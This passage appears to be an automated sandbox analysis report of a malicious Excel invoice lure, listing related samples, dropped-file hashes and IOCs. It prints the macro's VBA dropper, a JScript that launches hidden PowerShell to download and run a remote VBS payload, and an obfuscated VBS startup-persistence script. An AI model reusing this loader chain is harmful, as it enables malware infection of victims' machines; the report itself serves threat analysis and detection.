                Remittance Advice.xlsGet hashmaliciousBrowse
                • 194.247.196.66
                REVISED ORDER GEOTINDO 082022.docxGet hashmaliciousBrowse
                • 194.247.196.66
                EFT Payment Remittance.xlsGet hashmaliciousBrowse
                • 194.247.196.66
                Payment Copy.docxGet hashmaliciousBrowse
                • 194.247.196.66
                POXAUGUST.docxGet hashmaliciousBrowse
                • 194.247.196.66
                Microsoft_Excel_97-2003_Worksheet3.xlsGet hashmaliciousBrowse
                • 194.247.196.66
                q.docxGet hashmaliciousBrowse
                • 194.247.196.66
                Shipping Docs.docxGet hashmaliciousBrowse
                • 194.247.196.66
                QUOTE # EM067022_10.docxGet hashmaliciousBrowse
                • 194.247.196.66
                Payment Advice.docxGet hashmaliciousBrowse
                • 194.247.196.66
                nIRkAjHjX5.docxGet hashmaliciousBrowse
                • 194.247.196.66
                EM N#U00b0A0277527.docxGet hashmaliciousBrowse
                • 194.247.196.66
                Bank Letter.docxGet hashmaliciousBrowse
                • 194.247.196.66
                Foxconn PO935-082322.docxGet hashmaliciousBrowse
                • 194.247.196.66
                Purchase Order No.11724570.docxGet hashmaliciousBrowse
                • 194.247.196.66
                z7YfRvH6Tn.docxGet hashmaliciousBrowse
                • 194.247.196.66
                No context
                Process:C:\Program Files\Internet Explorer\iexplore.exe
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):5120
                Entropy (8bit):1.9275384817389136
                Encrypted:false
                SSDEEP:24:ruYGW/sNRG//sNrj+NqMJ+N1NlWItxvh:rlGWU/G/U1j+09ic
                MD5:A426EF4404E31DB042D71B5369D061E5
                SHA1:7D0C37B9E8EE57DB1781575159A2576795D3CFC3
                SHA-256:BD50763822DEF32225157B7B3A0323019266D70207D83784D8F1C97791EBEA3A
                SHA-512:9E9FB324CCCB9FB24A8250CDCF294C12B8EA7809F0E0CCFB32B781CEA87D52352139AD3FA1E5721C05452C69373CCA570373BAC6D621C9FEA12741E683EB660E
                Malicious:false
                Process:C:\Program Files\Internet Explorer\iexplore.exe
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):3584
                Entropy (8bit):1.743789820509013
                Encrypted:false
                SSDEEP:12:rlxAFCrEgmfS7KFcxrEgmfUB7qjNlaat5b6yU9D8LY:rVGcxGNNlVeyUB
                MD5:0D134A9EE698138395FC5D9DE3295FEF
                SHA1:A2550CB9C8EB47115C2E65A507F5ADF938649A1D
                SHA-256:1662CFCCD5D0DE79F4D43FF240A150C2139F3C390B1775CA1447E552A7E0E936
                SHA-512:54EFC7DEF5C2D06CA96DD64F569149CDCD486E77E9D37C7D09CC5CC43937D4C1F79C99F03F98F34EC204E0586683D5F7B9F0CA0A6A13FC499A3C74818002B19D
                Malicious:false
                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                File Type:data
                Category:dropped
                Size (bytes):31220
                Entropy (8bit):5.683956103084617
                Encrypted:false
                SSDEEP:384:nfFLlWD0KZIndnXmkoA4arnP/bGADEVRTHZUA7hlrNemjwyBhnzLBXP1ss:n9Ls4qQXvqarnP/bV47HNdHLnzl1ss
                MD5:A5260A2E6D406B433000AF10EEB2FDB6
                SHA1:D6A9F0BF1F83751E4D2D90C46B6242EC4DAA3519
                SHA-256:87C2FD333F33EC82B0ADE246EB99E72A4F5AACA9FD6FBE1AC15579F55803F0D4
                SHA-512:45EDBC741178173E3DCCBCF93EE9164010D7FE8C255B771D0360A4D9AE5803B4C6AA22CEC89831015047EE24EDF8482B7075DD5EEC2597CD9BA53758B1863FC7
                Malicious:false
                Process:C:\Program Files\Internet Explorer\iexplore.exe
                File Type:data
                Category:dropped
                Size (bytes):16
                Entropy (8bit):1.6216407621868583
                Encrypted:false
                SSDEEP:3:PF/l:
                MD5:FA518E3DFAE8CA3A0E495460FD60C791
                SHA1:E4F30E49120657D37267C0162FD4A08934800C69
                SHA-256:775853600060162C4B4E5F883F9FD5A278E61C471B3EE1826396B6D129499AA7
                SHA-512:D21667F3FB081D39B579178E74E9BB1B6E9A97F2659029C165729A58F1787DC0ADADD980CD026C7A601D416665A81AC13A69E49A6A2FE2FDD0967938AA645C07
                Malicious:false
                Preview:.p.J2...........
                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                File Type:MS Windows icon resource - 3 icons, 64x64, 32 bits/pixel, 48x48, 32 bits/pixel
                Category:dropped
                Size (bytes):30894
                Entropy (8bit):5.673553664350648
                Encrypted:false
                SSDEEP:384:BfFLlWD0KZIndnXmkoA4arnP/bGADEsTHZUA7hlrNemjwyinzLBXP1s3:B9Ls4qQXvqarnP/bV4iHNdHinzl1s3
                MD5:6EB4A43CB64C97F76562AF703893C8FD
                SHA1:C50C4273B9D2433C6069454F971ED6653E07C126
                SHA-256:1D7C95C5EEA00A8083A95810F902682F9E26E7FBB7876B022A403642D776D0C9
                SHA-512:3BAE9380D8F0D45617ECF9D0D43818B7F8F83B61ECBD5E6DBD189C19D5853F92AA47965AD257CF712E49C03652F129DCA47E8A8DBD86D62E614ACC99EA931181
                Malicious:false
                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                File Type:ASCII text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):4816
                Entropy (8bit):1.7456113877131143
                Encrypted:false
                SSDEEP:48:OBn6zALDCn/r4vGXKQuT4vGX1ebB7xxg8PzUPeSP3n5ZWibrE7xxpsGyN5nVJA7v:OB6zVnUujruYlxunExLAexb2aPdKe
                MD5:CD8CA76327C342972E95387B26538E45
                SHA1:7E4267DCC1CC342D8EDA436DC33FCC9D64C6E71C
                SHA-256:B042FBAAFC13E1DCC0D83D89229678D59884D3682FD814550F8FE68527538BD7
                SHA-512:638B689EE18080B097C8F54C7613C91F6E89D42B0A92EF02084561183640983F3D5825C589AEBCDCB5BFC82B60AFDCE9169CEFC2A0865BA3A6EF48B7C644C278
                Malicious:false
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):10108
                Entropy (8bit):3.370687020602186
                Encrypted:false
                SSDEEP:48:l3okLZ89ciY4XyY7ItVxwk+LRWlTa6R27k3jE0SfEJT/tx:NXa9q4Xb7I5Wn2A0xx
                MD5:4483F0091A0060BAD1008957AC7F7472
                SHA1:A09A7A5ECE4EB6512FFFE3E3B04C9329517E623F
                SHA-256:51E4F3327391C5B286E13BA09E80C5AD9412D93169B9B55BFB4B84AE9A41276F
                SHA-512:9CCE22C8B1FE896D142D39FFD9885E34AC08BDE6A2B5F01CA6503733719C220F03D2ADFE65EFBEED4352B4C313A77D0D2D5426B9A4228FFB3F053DDCD7F32EA5
                Malicious:false
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):2496
                Entropy (8bit):5.597323322816649
                Encrypted:false
                SSDEEP:48:FHzvuAKlMzIZ4hocLiFAU/cCdh4lMY5J9le13Y0qIe/Iznp:FHSAKlM8ZpcWFAW76lMWcC0qIsIznp
                MD5:7092568E9CF03F175C5602BF89E19FB8
                SHA1:8EB83AD1D62BCF98242BDBE1B69BA43C5F289570
                SHA-256:BEEA2E6F3382520530CB34B3870AB0C43D8C2F8A03156EA1B76FECCA78DCFC1D
                SHA-512:93A4B71B3CEA876FF90D53F9D96CBB3E5683401D50116156F16B4320ADF23970445FE9260817D9B0B23D46935E22C7C1536B6EE672E49075F170415DF5CE8532
                Malicious:true
                Preview:....FwLRtmpy=WGJH()........Private Function KdyH(str)..HknBVqN = ""..TTRZ="Mi" + "d(st" + "r,i,1)"..For i=2-1 to Eval(elfjje()).. char = Eval(TTRZ).. if(char<>" ") then.. HknBVqN = HknBVqN+Mid(str,i,1).. End if..Next..KdyH = HknBVqN..End Function ....Private Function WrJQi(g0fdg44)......Execute(VFAs())......End Function....Jfpnga = Eval(pibL())..afs = Split(Jfpnga,"\")..LWtRVP=Eval(rleVRmM(KdyH("57 53 6 3 72 697 074 2e5 363 72 697 07 44e 616 d65")))......UDWk="C:\Users\" + afs(2) + rleVRmM(KdyH("5c 41 7 07 0446 1746 15c 526f 616 d 696 e6 75 c4 d6 96 3726 f736 f6 674 5c 576 96e 646 f7 77 35 c537 4617 27 4204 d65 6e75 5c 507 26f6 7726 16d73 5c537 4617274 757 05c"))........if Jfpnga = UDWk Then....WrJQi(FwLRtmpy)....Else....WrJQi(FwLRtmpy)....WrJQi("Move-item '" + Jfpnga + LWtRVP + "' -Destination '" + UDWk + LWtRVP + "'")....End if ........Private Function WGJH()..FruYYoB=rleVRmM(GRCX())....On Error Resume Next....Set LmTHr = GetObject(KdyH("N e w:0 002 DF01-00 00-00 00-C000-
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):770
                Entropy (8bit):5.626218682122521
                Encrypted:false
                SSDEEP:24:cAIqDaZy5XAWCsgFMgGNbPKC4LGusNAKVrN:cgW2XAQgW5Nbvu0AgN
                MD5:D0AE486EEF636DEEDDFDA9366B5A7D7A
                SHA1:6CC3331D7E8AB3FDEDFCBEBF091EC6A24935B884
                SHA-256:740964B8F21B920E29D0EC54938ED220DEC6BCD150EE98DB88F3F8954969A54C
                SHA-512:89527995165B71768729B0607905D18CDB466C10BCCD924118F7021543107ACF5F6D03A7A0D57AAB27CE03167F12F1E6D1E311407F004A47F5FB15B117EB47FC
                Malicious:false
                Preview:var r = GetObject(emrkdsf())....var y7er00gg="Po"+ "wer" + "sh" + "ell";..var yy=r.ShellExecute(y7er00gg,wmkdflllw(),"","",0);..function emrkdsf()..{.....return "ne" + "w:137096" + "20-C279-11C" + "E-A49E-444" + "55354" + "0000"..}..function wmkdflllw()..{....return " $Erro" + "rActi" + "onPref" + "erence = 'Sile" + "ntlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\\qwe.vbs');" + "remove-item ($env:appdata + '\\sfoWQ.js')";..}..
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:gAWY3n:qY3n
                MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                Malicious:false
                Preview:[ZoneTransfer]..ZoneId=3..
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):28672
                Entropy (8bit):2.961262815451197
                Encrypted:false
                SSDEEP:768:Nfk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJ7e:xk3hOdsylKlgxopeiBNhZFGzE+cL2kd9
                MD5:2158F3BB9A3FAD15ED5A91F4FD26F031
                SHA1:A3C7BE23CC3299FDE6986EAAC440C8756B66220A
                SHA-256:4AAFB3F590AA713E69C35E6BC8EF7FD7900D5C4BB6ECBEE7E7E8A633A49A3515
                SHA-512:CFFD71B316E91EA6E60B0640CD54B71282F958663B0FD60C66C0C4D2B1E2D29282CC7F8620D9F15BA5E9801B3D819EC5EDAA325D5FD9A567B799536D2AC1BDF1
                Malicious:false
                Process:C:\Program Files\Internet Explorer\iexplore.exe
                File Type:data
                Category:dropped
                Size (bytes):16384
                Entropy (8bit):0.4551878047595137
                Encrypted:false
                SSDEEP:6:CMtPuxFUFAlkx1vCUGlJ8mX19Xh9XRClccYto8ZXrG:CMtPuxyqwqNn8G37qir
                MD5:102DB45E7445AEFB1DB4EE338B5A8394
                SHA1:A0D7870AFDDDAB66EDCC40675E2E42543BC4A63A
                SHA-256:08438CA4959DF71BD8A61B1B263806A1D1898B6FBCDED5EE2E447CFCCB602C81
                SHA-512:88CEAA087F0781742F0D5799B6A005B341C694A930E9F64978DE5C8D28BD88661DE8C88DB1B95263B96A6951282BD6B692069F9170AC42D92DFD3999399FD46E
                Malicious:false
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):3584
                Entropy (8bit):3.6516839114595685
                Encrypted:false
                SSDEEP:24:rM8gFb08aVNZwAIqDaZy5XAWCsgFMgGNbPKC4LGusNAKVr60RoboYmj:r3gFb2NZwgW2XAQgW5Nbvu0Ag6
                MD5:88FE8D48C045AE5948E97135E0079BA0
                SHA1:3DCDBED01BF9D0A1BAE73AE07238EFCDEE621F46
                SHA-256:ACF7463D122A4C63CBF6BD3E699CE41A3C8EBDB7EDEE2CD5C706712FEBFFA02E
                SHA-512:25B65893FCEE212C8F64DEA3F1CBF9409298D4C4867E01A50EA8100EE633F95633BBB1D2755CD8E201E4B5DBA4A64E0B571A67DD7A516B51FA275CCAD56DEB7E
                Malicious:false
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):3584
                Entropy (8bit):3.649122502410325
                Encrypted:false
                SSDEEP:24:rygFb08aVNZwAIqDaZy5XAWCsgFMgGNbPKC4LGusNAKVr60RoboYmj:rygFb2NZwgW2XAQgW5Nbvu0Ag6
                MD5:F7B221F69C58749DA0C319314CBC907E
                SHA1:139D0A58629389BA92D1AA0941C45D27C5A94D9D
                SHA-256:C6101119CE5F567036F858993520BEADEA45B9A782B0F9F5000EDB298CEFE1CE
                SHA-512:BFF8DC4054DD19E5E769270C1FC5D00EDF5B58C29B43DA3F979472EACE4011A5995A6275380CFF097B82F992C56B5DE8A5692F48A35023F660F3DC91B466CD8C
                Malicious:false
                Process:C:\Program Files\Internet Explorer\iexplore.exe
                File Type:data
                Category:dropped
                Size (bytes):16384
                Entropy (8bit):0.08856410781839605
                Encrypted:false
                SSDEEP:6:aMfllGlvalyPSstolkxMBo+u1kU9D89j1:tNlaat5b6yU9D8L
                MD5:D610B7C76F7E9400090680BFE35ECEB6
                SHA1:1990DF9BF0B8B349556CC1BF1BADA5552291D574
                SHA-256:B13149C08DD9924A14A1DC2F8C7246664412E624976571D276164D48109CC54E
                SHA-512:47659A375FE19F8CCF3C3501617774D8AFECC73C7B3274ADC235CFB261C207283D1EFFFE7EF2CE1B946A6D61A63C0127681BDDA7F00DC523E2A10FE7A75243FB
                Malicious:false
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Eng Moha, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Thu Aug 25 14:19:58 2022, Security: 0
                Category:dropped
                Size (bytes):122880
                Entropy (8bit):6.685800930904397
                Encrypted:false
                SSDEEP:3072:Zk3hOdsylKlgxopeiBNhZFGzE+cL2kdAHzqwa+A3nMS7+9Ns7SsK8:Zk3hOdsylKlgxopeiBNhZF+E+W2kdAWK
                MD5:50F5874C831B0C98689DE3CE456959B5
                SHA1:1FAD0135423648C3D8D6A4AD92E2686DD3050D88
                SHA-256:AD14E51FFC63523F619ED9A38A386A1999446F32F7052FAC49358F23A8656B00
                SHA-512:1D20A60B07E3BD09EF5A731CAFE998BD5F3B306A47021B9EA5FAF3B1C1847DE6FBEB292D99CB1536BAC8F8E6A72DB0366640AA6ECE96B32240CEB4C27072B041
                Malicious:false
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):28672
                Entropy (8bit):2.961262815451197
                Encrypted:false
                SSDEEP:768:Nfk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJ7e:xk3hOdsylKlgxopeiBNhZFGzE+cL2kd9
                MD5:2158F3BB9A3FAD15ED5A91F4FD26F031
                SHA1:A3C7BE23CC3299FDE6986EAAC440C8756B66220A
                SHA-256:4AAFB3F590AA713E69C35E6BC8EF7FD7900D5C4BB6ECBEE7E7E8A633A49A3515
                SHA-512:CFFD71B316E91EA6E60B0640CD54B71282F958663B0FD60C66C0C4D2B1E2D29282CC7F8620D9F15BA5E9801B3D819EC5EDAA325D5FD9A567B799536D2AC1BDF1
                Malicious:false
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):8016
                Entropy (8bit):3.5845126493336563
                Encrypted:false
                SSDEEP:96:chQCNAPXMqJqvsqvJCwo+z8hQCNAPXMqJqvsEHyqvJCwor4z/JYCHB01ellUVMjp:cofco+z8ofoHnor4z/r01exjp
                MD5:C36E98F5C60ED7F38034FF2CD258200D
                SHA1:93ABB6DBC41A09D9E52D3F745F93949087171F6F
                SHA-256:6360109CBC04D9C070DAC8476640FD0E4882F1AAB6C12562E95E8287CA3F55A7
                SHA-512:1B9D940156B478D7BAAF98D6EF8BDB26FF01223E76C687240A1FB39CF3B1FCA046E499443F1D646924703EFF56885CA4F1C61CD1FEAAA788FD0971BA7DB42D47
                Malicious:false
                Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):2496
                Entropy (8bit):5.597323322816649
                Encrypted:false
                SSDEEP:48:FHzvuAKlMzIZ4hocLiFAU/cCdh4lMY5J9le13Y0qIe/Iznp:FHSAKlM8ZpcWFAW76lMWcC0qIsIznp
                MD5:7092568E9CF03F175C5602BF89E19FB8
                SHA1:8EB83AD1D62BCF98242BDBE1B69BA43C5F289570
                SHA-256:BEEA2E6F3382520530CB34B3870AB0C43D8C2F8A03156EA1B76FECCA78DCFC1D
                SHA-512:93A4B71B3CEA876FF90D53F9D96CBB3E5683401D50116156F16B4320ADF23970445FE9260817D9B0B23D46935E22C7C1536B6EE672E49075F170415DF5CE8532
                Malicious:false
                Preview:....FwLRtmpy=WGJH()........Private Function KdyH(str)..HknBVqN = ""..TTRZ="Mi" + "d(st" + "r,i,1)"..For i=2-1 to Eval(elfjje()).. char = Eval(TTRZ).. if(char<>" ") then.. HknBVqN = HknBVqN+Mid(str,i,1).. End if..Next..KdyH = HknBVqN..End Function ....Private Function WrJQi(g0fdg44)......Execute(VFAs())......End Function....Jfpnga = Eval(pibL())..afs = Split(Jfpnga,"\")..LWtRVP=Eval(rleVRmM(KdyH("57 53 6 3 72 697 074 2e5 363 72 697 07 44e 616 d65")))......UDWk="C:\Users\" + afs(2) + rleVRmM(KdyH("5c 41 7 07 0446 1746 15c 526f 616 d 696 e6 75 c4 d6 96 3726 f736 f6 674 5c 576 96e 646 f7 77 35 c537 4617 27 4204 d65 6e75 5c 507 26f6 7726 16d73 5c537 4617274 757 05c"))........if Jfpnga = UDWk Then....WrJQi(FwLRtmpy)....Else....WrJQi(FwLRtmpy)....WrJQi("Move-item '" + Jfpnga + LWtRVP + "' -Destination '" + UDWk + LWtRVP + "'")....End if ........Private Function WGJH()..FruYYoB=rleVRmM(GRCX())....On Error Resume Next....Set LmTHr = GetObject(KdyH("N e w:0 002 DF01-00 00-00 00-C000-
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):770
                Entropy (8bit):5.626218682122521
                Encrypted:false
                SSDEEP:24:cAIqDaZy5XAWCsgFMgGNbPKC4LGusNAKVrN:cgW2XAQgW5Nbvu0AgN
                MD5:D0AE486EEF636DEEDDFDA9366B5A7D7A
                SHA1:6CC3331D7E8AB3FDEDFCBEBF091EC6A24935B884
                SHA-256:740964B8F21B920E29D0EC54938ED220DEC6BCD150EE98DB88F3F8954969A54C
                SHA-512:89527995165B71768729B0607905D18CDB466C10BCCD924118F7021543107ACF5F6D03A7A0D57AAB27CE03167F12F1E6D1E311407F004A47F5FB15B117EB47FC
                Malicious:false
                Preview:var r = GetObject(emrkdsf())....var y7er00gg="Po"+ "wer" + "sh" + "ell";..var yy=r.ShellExecute(y7er00gg,wmkdflllw(),"","",0);..function emrkdsf()..{.....return "ne" + "w:137096" + "20-C279-11C" + "E-A49E-444" + "55354" + "0000"..}..function wmkdflllw()..{....return " $Erro" + "rActi" + "onPref" + "erence = 'Sile" + "ntlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\\qwe.vbs');" + "remove-item ($env:appdata + '\\sfoWQ.js')";..}..
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Eng Moha, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Thu Aug 25 14:19:58 2022, Security: 0
                Category:dropped
                Size (bytes):122880
                Entropy (8bit):6.685796511585403
                Encrypted:false
                SSDEEP:3072:5k3hOdsylKlgxopeiBNhZFGzE+cL2kdAHzqwa+A3nMS7+9Ns7SsK8:5k3hOdsylKlgxopeiBNhZF+E+W2kdAWK
                MD5:A7CAEDC763C5BB36218E1A3A4725A5B8
                SHA1:B19441BD94A28ECCB85F8FEACFB961701EF96B4F
                SHA-256:56DF702752FFFF6F6A6C208CD816F0C0310D16BB970F4C9BBA0D98C1D8C070BC
                SHA-512:777418DECE3A30F4072A5425F052D28386B9A8ED4C33C2AD26BAE0C82247054607206F55E5890AFB73E65F9C475B01CF34DA294576A3A75B3E6CDA1DCA6541CA
                Malicious:true
                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Eng Moha, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Thu Aug 25 14:19:58 2022, Security: 0
                Entropy (8bit):6.6858198191962
                TrID:
                • Microsoft Excel sheet (30009/1) 47.99%
                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                File name:ACH Remittance Advice_CITI25822.xls
                File size:122880
                MD5:3af8864299165b527737ecb59ec7f47b
                SHA1:7199e298af1f0f3273a3e6d9b4186805211c58b5
                SHA256:f9b92212d4dbdbddabd88e8e49a5672b5a5bb8fc29243628578fd037de26fcfa
                SHA512:8035746e5298e46eabf87e1c3fd49af3ceac6e35d841bb23a5ec774d14983a07ba98e93a23d6f279c83d012b1c04cba724a95ad1ff466f40d44055911052a438
                SSDEEP:3072:lk3hOdsylKlgxopeiBNhZFGzE+cL2kdAHzqwa+A3nMS7+9Ns7SsK8:lk3hOdsylKlgxopeiBNhZF+E+W2kdAWK
                TLSH:CEC38D7AB6818427DE9903358FE68E4B3379FC52AE1387473602776D2E775C04E62B21
                Icon Hash:e4eea286a4b4bcb4
                Document Type:OLE
                Number of OLE Files:1
                Has Summary Info:
                Application Name:Microsoft Excel
                Encrypted Document:False
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:False
                Flash Objects Count:0
                Contains VBA Macros:True
                Code Page:1252
                Author:Eng Moha
                Last Saved By:Administrator
                Create Time:2015-06-05 18:17:20
                Last Saved Time:2022-08-25 13:19:58
                Creating Application:Microsoft Excel
                Security:0
                Document Code Page:1252
                Thumbnail Scaling Desired:False
                Company:
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:1048576
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                VBA File Name:Sheet1
                Stream Size:977
                Attribute VB_Name = "Sheet1"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                VBA File Name:ThisWorkbook
                Stream Size:3332
                Attribute VB_Name = "ThisWorkbook"
                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                Sub fSPA()
                Dim rdHTJ, aySfhM
                
                Const USER_PROFILE = &H28&
                 
                  ActiveSheet.OLEObjects(1).Copy
                   Set aySfhM = CreateObject(mermkd())
                   rdHTJ = ZtYDD(aySfhM, USER_PROFILE)
                  
                  gfdg = TEwe(aySfhM, rdHTJ)
                
                
                
                 srhzflXfC (rdHTJ)
                 aySfhM.Open (rdHTJ + "\sfoWQ.js")
                 
                End Sub
                
                Private Sub Workbook_Activate()
                Call fSPA
                End Sub
                
                Sub srhzflXfC(rdHTJ)
                
                
                Name rdHTJ + "\sfoWQ.txt" As rdHTJ + TfmwpR()
                
                
                
                End Sub
                
                
                Private Function TEwe(gdfgdfg, t5fdg00)
                 gdfgdfg.Namespace(t5fdg00).Self.InvokeVerb "Paste"
                End Function
                
                Private Function TfmwpR()
                TfmwpR = "\sfoWQ.js"
                End Function
                
                Private Function ZtYDD(vv0edd, e777g00)
                 ZtYDD = "C:\Users\" + vv0edd.Namespace(e777g00) + "\AppData\Roaming"
                End Function
                
                Private Function mermkd()
                mermkd = Range("A1").Value
                
                End Function
                

                General
                Stream Path:\x1CompObj
                File Type:data
                Stream Size:108
                Entropy:4.188499988527259
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                General
                Stream Path:\x5DocumentSummaryInformation
                File Type:data
                Stream Size:244
                Entropy:2.651752272670879
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                General
                Stream Path:\x5SummaryInformation
                File Type:data
                Stream Size:220
                Entropy:3.609942546600991
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . \\ . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E n g M o h a . . . . . . . . . . . . A d m i n i s t r a t o r . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . @ . . . . . _ . . . . . . . . .
                General
